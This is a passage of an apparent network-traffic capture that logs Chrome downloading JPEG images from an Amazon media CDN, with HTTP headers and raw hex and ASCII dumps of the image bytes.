                                                                                                                                                                                          Last-Modified: Wed, 15 Jan 2020 21:51:42 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 25 Nov 2044 17:09:30 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          Age: 940184
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000062-IAD, cache-ewr-kewr1740022-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 bb 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 08 01 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 03 00 02 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f2 cf e9 7e 8d 11 75 6e 51 7a 5f a3 82
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5~unQz_
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 8c c8 ab db e0 fe b9 5f eb 46 c5 94 b0 33 f8 cf 4f 8a 34 98 33 9f ac c7 e4 ef 59 79 92 64 39 a5 e4 3a 1e f5 b6 64 0f 41 37 e4 f4 18 ef 90 f2 34 79 fc f9 c4 7e ee 36 90 35 19 f0 ec 89 23 60 f3 be 7b dd 1a e2 b2 e5 1c 19 fa b0 a5 0d bb 1c d6 5d 85 f4 01 ac 48 aa 4d 9b 02 d1 aa 75 a8 32 f6 0a 04 27 3e 1f d1 bd 4c 92 49 de af 3c 00 72 23 ba 9c f9 7e 59 82 f0 c4 70 74 ab da 6f c3 4a f8 df 6d e8 0f 39 dd 88 b1 73 67 c3 38 e8 f0 b5 6f cb 2c bb 94 40 ab 6a 2a 6e 06 ef 29 1b e5 ad 5b 09 bf c0 db b3 65 11 5c 5b 4b 24 39 24 31 1a 2c 79 54 77 cb a8 b1 e1 7b 03 50 d9 f9 3e ce 6d 01 22 72 01 ab 18 22 bb a6 7c 97 d8 3e b1 36 ff 00 3d 69 5d b7 3e d3 be e5 12 83 f6 a2 4a d6 ea 36 5d ee a5 f5 94 a2 55 ed 79 3f 7f 05 42 81 cd 68 e9 08 7e a4 67 1b 1c 72 6c f3 24 cd e8 ac f2
                                                                                                                                                                                          Data Ascii: _F3O43Yyd9:dA74y~65#`{]HMu2'>LI<r#~YptoJm9sg8o,@j*n)[e\[K$9$1,yTw{P>m"r"|>6=i]>J6]Uy?Bh~grl$
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 9a f3 9b 92 a2 a3 32 b0 3c 16 70 46 30 d4 c3 af 89 c5 06 15 e2 29 12 a9 74 ce ae 7e 17 21 ba d6 56 e4 2d 61 41 84 c8 2f 8e 90 42 df ab a7 c8 f9 91 99 77 a5 f3 90 9b 0e 48 0f 5d c4 59 b4 4f 8b bf 8b 84 9c 33 b9 64 d1 bf 20 76 43 3c 2b dd 19 62 f8 9e 8c 73 91 2f e4 85 87 7e fc 4b a2 ac e5 e8 54 9b 66 9c 12 aa 67 29 88 aa 7e d7 06 11 4a 66 5e b0 7a 14 b1 f2 c1 e6 82 af 72 58 60 57 ec c6 6e d5 ff 00 48 d4 b1 57 a0 4f 01 fd f8 4a dd 49 5c 00 ff 00 1b 05 d6 07 9a 38 20 21 d0 ee 2c 0a fd 15 1c 86 7a 07 dc 26 fa 5d ec c6 2f cb 5c 08 ca 51 23 ec 9a 07 dc e7 a9 34 b9 f2 ee 0c d4 7b ca 7e 49 a0 40 8f f0 c7 7f c9 1f 64 76 e9 1f f4 8f 9d 21 fe 91 fb ea 1f e9 1f 38 54 fd 23 6f 09 7d 48 d7 22 eb 00 9f ff c4 00 33 10 00 02 02 02 01 03 03 03 04 02 01 04 02 03 00 00 01 02
                                                                                                                                                                                          Data Ascii: 2<pF0)t~!V-aA/BwH]YO3d vC<+bs/~KTfg)~Jf^zrX`WnHWOJI\8 !,z&]/\Q#4{~I@dv!8T#o}H"3
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 8d e4 77 f1 af 7e 26 6b d9 d4 f6 d2 fc bf 89 19 3a 3c 99 9a fd f9 16 a9 f1 df 45 5b 12 c7 45 3a a2 fa ef fb 78 89 c4 4e 22 71 99 e7 4a 16 24 c8 f3 31 2c e9 d8 a4 f0 85 40 f3 98 9f c1 74 ae 7f e3 97 f9 82 7e 04 53 c5 d4 cb 18 d8 dc 99 7c 09 b9 b8 3d b0 73 86 3f c4 f2 df 79 60 94 a0 f3 39 ff 00 ad ee 15 58 c8 14 4f 0b a5 be e2 ed a2 d2 c5 dc c1 c8 ff 00 c4 db ee 1d 72 0f 42 c0 e9 46 78 7e d6 7b db 6e ac 73 3e b6 5b 6f 2f 6f 4d 6d d2 27 aa 58 51 f1 a6 7f f8 2f 95 cf e8 04 c8 fb a0 fc 4f c4 af fc 89 3d 52 9d 05 75 c1 63 42 b5 86 c7 36 31 63 04 58 0c f4 a7 fb d2 32 c5 3a 9b f6 cc f5 77 6f 8d 5e 91 4f 22 6e 62 63 36 99 a0 6d c2 bb 8f 5f fa e7 f2 d4 3c 50 a8 6f a7 16 8d 1a ed bf 14 f0 98 f7 8b d7 90 c9 b3 a4 84 c4 11 94 47 f6 f4 bb b8 5b c6 7a 9e 6a 5d 68 59 7d
                                                                                                                                                                                          Data Ascii: w~&k:<E[E:xN"qJ$1,@t~S|=s?y`9XOrBFx~{ns>[o/oMm'XQ/O=RucB61cX2:wo^O"nbc6m_<PoG[zj]hY}
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: cf a3 68 30 1c cf d3 1e 7e 94 f3 d4 31 0d 0e a0 f5 5a 75 1a 75 0c c1 ff 00 1f 7b 6c fe 70 26 18 e2 4b 4c 8c 63 77 ca bc 4f 93 54 63 3a eb 73 30 1b 6b 3a c1 a7 a2 1e 3f c8 c7 7f 88 59 61 96 7e 00 fe b0 46 9f 88 bd d1 a7 e4 9f 63 f1 8c 3e 30 d4 cc 14 26 29 28 a1 0e 43 06 06 53 60 a0 f6 ab 27 ac 35 0f 7e d2 eb 39 31 d7 36 9d 46 9d 56 9d 67 13 ea 6d 13 eb 6e 97 5c f6 1d b7 b7 4f 90 d4 c6 21 10 4a 58 b5 bb 35 d7 f0 8a 78 c5 a1 37 b9 d4 55 f8 c2 fd 4e 21 9d b8 f6 8b de 58 da f1 66 25 ca 36 28 cf b2 82 79 64 ea c5 16 08 d0 78 9c f8 ec 7b 6c 09 ff 00 ec 4f ff 00 74 5b c1 eb 8a 7f 13 36 a1 a2 2b a3 1f 91 28 71 d0 d7 cc 36 45 bc 17 b0 9a dc e1 bf 1d 39 55 7c fc 74 84 d6 8c b3 cf b5 69 b9 5a 77 12 f7 ff 00 c6 2b a3 ab d9 3f 96 bf bc c5 3f 88 f6 9a e5 1d 98 93 92 e7
                                                                                                                                                                                          Data Ascii: h0~1Zuu{lp&KLcwOTc:s0k:?Ya~Fc>0&)(CS`'5~916FVgmn\O!JX5x7UN!Xf%6(ydx{lOt[6+(q6E9U|tiZw+??
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 15 cc dc 35 a9 11 0b 28 e2 7f 66 4f 91 16 1f 61 ec 7d 81 9e 21 ef 09 d4 aa be 67 51 eb 29 e6 25 5d b9 36 bf 3f b3 73 73 c4 1d e3 09 cf dc 1f 6f 12 8a 45 83 62 eb ac 04 a8 00 fe cd cc 8f 22 0f dc 98 bd 40 a4 0c 60 ac 15 9a ae 0d c4 b6 23 2b f1 1d 3a 87 66 c7 1f 31 33 93 55 13 31 e9 d8 ea 59 6d c6 c3 3d 30 73 de ed fe 1b 42 8c 9c 10 fd d4 82 a4 83 88 a2 c5 65 38 d8 e6 e8 ee 89 d9 16 eb 5b c1 b3 94 a6 be a4 2a b2 ca 5a be f1 2b f8 f3 26 8a eb 3a 6b e8 e0 01 1e 9b d9 66 53 7c da 0f 72 7d b2 3c 88 3f 60 f6 c0 ff 00 20 13 c6 4c cd 74 16 08 6d 5e 7c 4b d6 fe 25 1a 16 8e 39 85 7a 7f 2b 2a 4c 94 d4 b2 b6 a4 e8 fa 4b 7d f3 34 ff 00 c8 aa 5b 93 d2 b8 4b a8 4c 81 b1 8f 8c 69 0e 5b 0d 39 53 a0 d8 ce bd a5 38 96 92 26 7d 1d 3d 19 6b ad 0a a8 09 5e 8c 39 7c 2d 65 39 5c
                                                                                                                                                                                          Data Ascii: 5(fOa}!gQ)%]6?ssoEb"@`#+:f13U1Ym=0sBe8[*Z+&:kfS|r}<?` Ltm^|K%9z+*LK}4[KLi[9S8&}=k^9|-e9\
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 10 22 31 41 14 32 06 15 20 23 42 16 51 71 ff da 00 08 01 02 01 01 08 00 d4 26 00 49 d0 4c 1b 59 80 22 9a c0 d0 ed 24 ed 24 ed a4 ed a4 ed a4 ed a4 ed a4 ed ac e0 b2 ec 55 b2 b2 b0 e3 ba 92 a4 ee 03 b9 c6 33 68 6e 25 45 88 51 56 32 54 34 37 1e a2 4e c0 67 4f dd 56 cd 6c 72 b0 78 85 6d d7 9d 5a a2 0b 58 3f 12 12 dd f2 81 2d 00 09 c6 dd ee 28 70 7d cf 8f b3 cd 5f 19 6c 58 c0 88 0e fc c2 7c 89 88 9b b0 b4 dc dc dc 7b b7 b5 66 b6 95 f7 0e f5 27 65 c3 d4 c6 7b 38 ee 1b 2b 24 96 2f 40 04 91 91 59 31 72 2b 51 a5 ef 39 9c d9 aa f0 84 7f cd cb ab 4c 53 f5 3e c4 c2 ff 00 a3 e8 4e 81 23 89 73 b7 5f 67 c5 a5 1b de 10 a9 58 1b 5e 42 dc c4 f9 7e 4d 69 0c cd 59 4e 2c 2d 1e 40 e7 3b ea bb 26 bb dd 96 10 a4 ec df fb 08 a7 c9 9f 73 13 f5 68 f9 21 21 cb 78 33 b6 00 23 22 77
                                                                                                                                                                                          Data Ascii: "1A2 #BQq&ILY"$$U3hn%EQV2T47NgOVlrxmZX?-(p}_lX|{f'e{8+$/@Y1r+Q9LS>N#s_gX^B~MiYN,-@;&sh!!x3#"w
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 41 9b 91 d4 e2 7e 9b ac d7 7d ef 8b 4d 14 76 93 8f a5 9f ac 1f 1e af 7e 48 be ea e3 f5 cc 94 ae 8b 62 65 ad f8 d7 b0 c4 eb 4f 8f 8a b5 4e a5 7d 5f d5 1e c2 db 98 0e 35 b8 b7 ff 00 2a ab 2b 07 42 ae a8 99 99 77 26 55 7d 57 0e bc d5 a2 a1 d4 72 ed 71 78 af ae e6 b8 ab 1e cc 5e a3 90 f6 d0 a9 80 07 f7 d9 70 78 13 72 d3 ed ff 00 0d 0f 99 ed d6 8b 63 a1 46 49 47 44 ae bc 76 c7 b2 9f e3 cf 5b 35 4d 57 4c ae 97 ad 96 ee 83 88 f7 0c 83 7f f1 9c 4c 86 36 bd 1f c7 31 68 b6 ab 2a 5c 80 07 11 cc 7c 91 67 fe 93 a4 57 5e 63 66 27 76 73 8e 7c 7f 87 23 36 4c d7 d4 e3 38 ce 10 21 fa 2b 05 7a 1e 7b 7b 33 81 d4 d9 fa 0e 7e f9 ce e0 8d 67 89 b3 a9 ce 72 9c a7 39 ce 73 9b 9b f5 e6 75 39 ce e1 9c e7 39 cc 40 d1 8c 2d 37 e6 68 4d 7a 8f 50 66 e6 e0 33 cc d1 9c 4c b3 21 6a 04 b5
                                                                                                                                                                                          Data Ascii: A~}Mv~HbeON}_5*+Bw&U}Wrqx^pxrcFIGDv[5MWLL61h*\|gW^cf'vs|#6L8!+z{{3~gr9su99@-7hMzPf3L!j
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: e3 58 0d 14 8b 82 32 99 9a a3 27 18 ad 74 97 0a 12 db f2 86 22 2b d8 9c c2 83 3b e7 52 fe 4d 58 da f5 46 51 a1 f3 56 87 a8 96 f7 37 ec 71 18 9d 4c b9 ba c6 18 ae 4e 94 ec 1e 27 44 7b 60 5e c4 9a 8b 63 bb 4b b1 19 ef 64 7b b0 df a6 e5 a5 d4 be 52 64 a2 5a b5 e4 9a c3 a8 b4 02 a0 b6 45 15 d9 42 a5 cb 9e 9c 02 c1 d4 12 59 98 8e ba 04 42 0c e0 62 22 13 a7 2c be 12 a7 c4 6a ab 4b 4b 6c 31 8b 6e bd e8 a5 9c 33 d7 46 48 1c 52 cc fa c2 ba 5e 02 d7 7d 9d bb 42 05 03 5d 41 d0 51 55 d4 e1 de f6 87 36 da ca ab c0 b6 0d 6d c9 6a d9 11 0e da 6f cc 6f 33 66 03 29 47 d9 b1 6d c8 6b 74 0a f4 6b 1d d7 7f 21 a4 9d 8a f1 ea a2 b2 a1 2f 5b 0f 34 b3 20 59 4f 29 4e 58 b1 89 39 f7 64 1c 7d 63 55 d4 9a aa 45 46 bc b7 01 1d b2 a9 b6 bc aa ec 86 d7 aa cb 02 44 f7 f4 10 c5 f7 88 94
                                                                                                                                                                                          Data Ascii: X2't"+;RMXFQV7qLN'D{`^cKd{RdZEBYBb",jKKl1n3FHR^}B]AQU6mjoo3f)Gmktk!/[4 YO)NX9d}cUEFD
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 7f 0c ea 1e 5d c4 87 33 b5 5d 6d 6e fa fa 55 1c c7 54 46 b3 07 df ad 6b 40 ff 00 89 cc 9c d4 01 06 b0 d1 f7 26 91 26 7a 97 a2 2b 31 58 5b ea 85 48 bb 7c a8 72 a1 3f 0a fc df d3 37 47 df f0 a6 6e 7f 7b 31 39 81 cc 21 e2 34 a6 0a 62 03 b6 64 3b ae 54 46 58 54 6e b3 76 6d 23 f7 b9 7f 09 e6 67 34 1b 2a 03 6e 16 fa 82 f5 fd ab 8c 76 31 2d 39 ac 98 cc 9e 20 32 72 5a ec 26 a0 30 6d 8c 15 da 71 0a 64 d4 e6 c5 52 74 f1 bc c9 06 02 cc 7d f3 7a 93 2d df 2a e5 88 cf 1e 3e ca 13 ee bf 97 6e 16 e2 17 ab ed 7a cb fc 2a 0a a8 10 6e e2 ee 8d be 5a e7 62 a8 af 8c ff 00 f2 2c 8b 92 39 97 42 bf 97 6e 16 e2 17 a9 62 b1 cc 39 97 e6 5c bf 8c fc 3a f6 55 16 57 0b 6e 16 d1 ed 99 c6 dc 17 f2 c5 b8 5b 8a d2 c9 32 69 2f ed 17 6f 43 27 98 de ab 85 5b 6a dc 40 91 dd 8a 06 2d 7e 18 78
                                                                                                                                                                                          Data Ascii: ]3]mnUTFk@&&z+1X[H|r?7Gn{19!4bd;TFXTnvm#g4*nv1-9 2rZ&0mqdRt}z-*>nz*nZb,9Bnb9\:UWn[2i/oC'[j@-~x


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          130192.168.2.1649870151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC413OUTGET /images/M/MV5BMTc2MTY4NTM2NV5BMl5BanBnXkFtZTcwNzEyMzkxMQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 14097
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: aeb8b9ae-7e6e-488e-9658-2e2f23003bdd
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 13 Mar 2008 23:21:13 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 12 Oct 2044 15:33:44 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 876078
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200074-IAD, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 ab 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 01 04 05 07 08 02 03 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec 60 00 00 00 00 00 00 00 00 00 0a 94 56
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4`V
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 24 02 73 03 9d a7 a0 01 e8 00 00 02 ce f6 c2 35 fe ce d6 1b 3f 37 13 15 95 eb 6d 4f cf 6c 47 cd 5e 5e bc a2 be 7d 15 28 74 04 0a 79 14 9b fd 2f d2 1b c3 9c 53 44 ea 2c 85 f9 bc 36 2f 46 ac 86 cd 02 05 36 85 cd 0f 74 ad 00 3d 00 00 00 58 df 58 46 bb da 9a a3 6b 65 89 d7 7b 13 5d e9 f9 af eb 37 2c bd e0 77 d3 ff 00 59 f4 c0 b3 79 1c 3e bc f1 cb 7b dc 75 e1 bf a5 11 de eb cd bd e6 9e 94 e7 64 e3 bf a6 d5 d5 e7 ea 55 4b 00 87 ca a3 92 40 00 3d 00 00 00 59 5e d9 46 b9 da 9a bb 68 c6 22 17 34 88 dd 71 0f bf b7 cb 3f 77 e3 f2 f3 6f 39 59 e3 7e b8 8b e0 f3 61 69 e3 7e 5e 86 ee 9e 0f ee b9 72 71 c9 0d d2 6b 1d 8f f7 20 50 10 e9 6c 2e 66 00 07 a0 2b 8e 81 cd 6c da c2 e6 16 7a 56 88 b2 bd b1 88 06 ce d6 3b 32 5c 6c 42 5b 1b b7 88 2c bd 62 38 fd 5f 7f 19 dc b2 70 d7
                                                                                                                                                                                          Data Ascii: $s5?7mOlG^^}(ty/SD,6/F6t=XXFke{]7,wYy>{udUK@=Y^Fh"4q?wo9Y~ai~^rqk Pl.f+lzV;2\lB[,b8_p
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: f2 36 37 8c e4 37 d4 1c 63 9e 4c 1f aa 13 44 d3 2c 4e bc b3 06 f4 80 97 01 33 06 a5 56 03 b3 a9 c5 99 c4 88 5e 28 64 b0 c6 e1 0d 53 b7 9e 8d c1 3c 52 4a ad d4 2a fa 75 60 f2 9e ed c4 78 ad d6 7b d2 9e 50 67 32 3b 0f 9b 8c 65 68 87 36 73 b6 70 3b 34 83 34 ac 60 07 b6 f7 61 e9 3a b7 27 d1 70 d3 c7 28 6e a2 92 cc 61 c4 6a 51 44 2f 1b 8a ba fb b8 0f 27 1f dd d5 05 11 e4 16 e4 51 83 6e ab 8b e2 1f 4c 15 01 54 0d 72 c4 28 4f 39 af c8 aa 40 c7 50 99 e1 7d 2c a3 95 e1 86 ae 4d 26 56 24 11 a9 0b cd 55 c1 b1 39 b7 b3 16 54 2b ef 6a 48 2a 50 ce 68 22 66 7d 5c 79 ab 1f 55 71 64 7f 55 b6 64 16 be cc f2 bd 66 7d 71 33 b6 db dd 87 dd fe 7b 1d 6e 0a cc 32 88 bf d5 64 05 80 5e 09 1f 55 56 cf 85 65 8a 3e 51 29 23 78 a6 96 c1 47 5c e4 af 34 41 65 f4 84 b9 62 cd f7 00 16 1b
                                                                                                                                                                                          Data Ascii: 677cLD,N3V^(dS<RJ*u`x{Pg2;eh6sp;44`a:'p(najQD/'QnLTr(O9@P},M&V$U9T+jH*Ph"f}\yUqdUdf}q3{n2d^UVe>Q)#xG\4Aeb
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: e5 12 bf 10 26 87 53 b0 b5 59 ec 51 fa 24 6c 4c e4 e4 14 e0 28 db 33 58 8f 60 4d d6 75 07 9d 17 67 50 f6 5e a0 fc 49 3a 3e 9f f9 ce 8c bc 6c 99 7a 84 b4 ee 95 99 75 2a fe 58 fd b8 87 60 4d d6 25 5f f2 11 76 75 0f 65 8f fe 24 9b 5a 37 74 d0 3a 18 f2 76 d5 2c 4d 93 90 ec f4 fb 67 24 cc d2 e1 36 48 d8 93 2f 52 0e 6d 12 9e 2d 2e ab 72 90 3d b7 9b e3 d7 25 5f f2 11 76 75 0f 65 8f 7e 24 88 21 d4 86 26 65 96 5b 09 bf 95 26 6e 88 96 6b d3 6f f7 cb 60 af 51 3e 43 12 9f 49 06 6a bb 11 98 64 de cb bf d7 ae 4a bf e4 22 ec ea 1e cb 17 6c eb c8 b2 f6 39 ff 00 8e 0e fd f2 66 4e ec bd 39 f9 0e 9d 0f 65 72 90 5b 1d 27 0e 0f 5a 24 d1 88 fc 7d 97 5f e3 d7 25 5f ce 8b b3 a8 7b 2c 55 f2 af 26 dc d3 8f fa 52 b3 7c 4b 5b ed f4 e7 e4 3a 74 1d 9b a1 7b b0 75 c9 57 f3 a2 ec a1 ec
                                                                                                                                                                                          Data Ascii: &SYQ$lL(3X`MugP^I:>lzu*X`M%_vue$Z7t:v,Mg$6H/Rm-.r=%_vue~$!&e[&nko`Q>CIjdJ"l9fN9er['Z$}_%_{,U&R|K[:t{uW
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 41 20 32 13 22 05 40 42 50 ff da 00 08 01 03 01 01 08 00 fe b5 cb 9b a5 cd c2 5c b9 7a df 0d 4d b3 64 d9 36 cd a2 6d 13 68 9b 66 d9 f8 e6 ca e2 27 e1 7c a3 4b d2 b9 c7 01 80 69 50 9d 07 bf 95 e9 72 e5 e8 74 bd 2f 9c ca e7 02 6c ad 2e 5f 31 88 3f 61 19 63 25 42 34 1c a6 27 d8 42 26 20 fd 60 42 4c 6c 02 a2 e2 fc 7d f0 83 51 1a e6 d6 61 13 04 28 99 82 6e a0 e5 30 0b 30 1d 8d 51 47 81 5b 45 4c 6c 3b 33 6d 72 98 b6 48 a7 52 3b 5c db af 88 31 b7 95 8c 96 2e 3a d1 3c a6 21 a6 06 62 b8 24 12 e4 33 7e a8 81 14 13 8b 9d f4 37 58 9e e6 d3 c6 60 f0 44 34 d1 4a a9 b8 73 0c d3 f1 92 61 5a 83 b8 5c 4d 90 89 ef 80 e8 41 bf 21 ab a3 88 4c 0c 44 06 c5 91 dc e8 e8 78 4e 97 7f 0f f3 01 84 d9 97 a7 be 2c 3c 8b e2 41 fc 48 af 2f 97 d9 62 18 be 44 a8 57 91 2b 7a d8 00 2f 87 c6
                                                                                                                                                                                          Data Ascii: A 2"@BP\zMd6mhf'|KiPrt/l._1?ac%B4'B& `BLl}Qa(n00QG[ELl;3mrHR;\1.:<!b$3~7X`D4JsaZ\MA!LDxN,<AH/bDW+z/
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: c8 6a 1e 05 a3 ce ba a9 a8 c8 14 cd be 38 05 a2 80 a8 d7 5d c2 9a ea 35 84 ef 82 1a 8e af 21 5e 61 d7 5e 4a bc f5 e0 75 57 70 a1 d7 50 a6 50 52 0a 68 e1 92 93 68 8a 79 58 8d 19 46 9a ea b3 26 cd 77 0a 1b 1d ec 82 36 ff 00 0c ae 16 32 36 6b b8 50 d8 37 1f 84 57 9a c6 69 85 30 93 e8 bb c7 55 77 0a 1d 7c 2e 7f 0c af 35 8f 33 6c d7 70 a1 bc fc 32 9b 4c ec 79 86 eb 43 73 ed af cb ae ba 84 7b 43 75 a1 bc f2 9b 0d 8f a9 8a 10 dd 68 6f 3c a6 ea bb 85 0d e7 94 dd 56 e0 c0 26 39 dc 60 a4 68 64 6d 50 d9 c2 df 94 dd 56 e3 ba 09 d9 1e 99 a8 cb 82 cb 3c 21 e8 bb cc 30 36 68 75 d2 e6 86 ea b7 19 45 18 08 ac 06 05 55 b6 68 75 d2 e6 86 ea b7 02 2c 38 f0 5b 33 f4 42 2e e1 80 f5 53 39 9a 9b 34 3a e9 63 15 88 d7 82 71 31 8d d5 6e 58 0f c1 08 7a 4a d5 0e ba 5c 9a da 74 cd e3
                                                                                                                                                                                          Data Ascii: j8]5!^a^JuWpPPRhhyXF&w626kP7Wi0Uw|.53lp2LyCs{Cuho<V&9`hdmPV<!06huEUhu,8[3B.S94:cq1nXzJ\t
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: f3 92 4c ff 00 25 0f c4 fc cc 64 26 05 14 75 2b 3a df e4 ce 2a bd d4 b5 ea 05 af d1 e5 9d 76 c4 7b 2d c9 c5 4c 53 79 14 16 08 e9 b5 c4 53 e4 45 48 d6 35 6a bf 44 8e 34 ab d5 0f a7 02 85 b7 d8 5f e4 64 6d c3 fe 73 25 74 b4 b6 f7 7f f3 a5 8a cb a5 fb 74 e8 76 51 9b 8a 2a 7f a2 2a 81 7d 8f f3 2c 0c 26 4f 5b 70 7c 41 df 36 17 1b 39 bc 90 fd ae 55 96 5f da 91 89 74 ce 28 93 15 02 6b 9b ae 45 94 44 82 4d 7c a0 a4 59 f0 93 99 94 8b 6a b3 bf 3f f4 63 f6 58 3a 72 f4 4f 43 85 b2 3c c3 58 08 72 19 41 3d 9e 4c 39 da 0e 75 24 5a 5d 66 d9 fb 34 0a 37 14 fa c3 75 7e 87 fa 1f da f1 fb 3a 52 c5 d2 fd ba 18 ea ca cc 93 85 c8 a2 52 6c a8 33 64 72 d3 52 dc d1 88 02 af 3b fc 09 a2 53 26 f5 86 86 87 02 71 91 7b 8e 46 1b 9c 88 bf a8 ee d8 84 49 8b 72 d9 b3 cd a4 7f 02 9c 14 9a
                                                                                                                                                                                          Data Ascii: L%d&u+:*v{-LSySEH5jD4_dms%ttvQ**},&O[p|A69U_t(kEDM|Yj?cX:rOC<XrA=L9u$Z]f47u~:RRl3drR;S&q{FIr
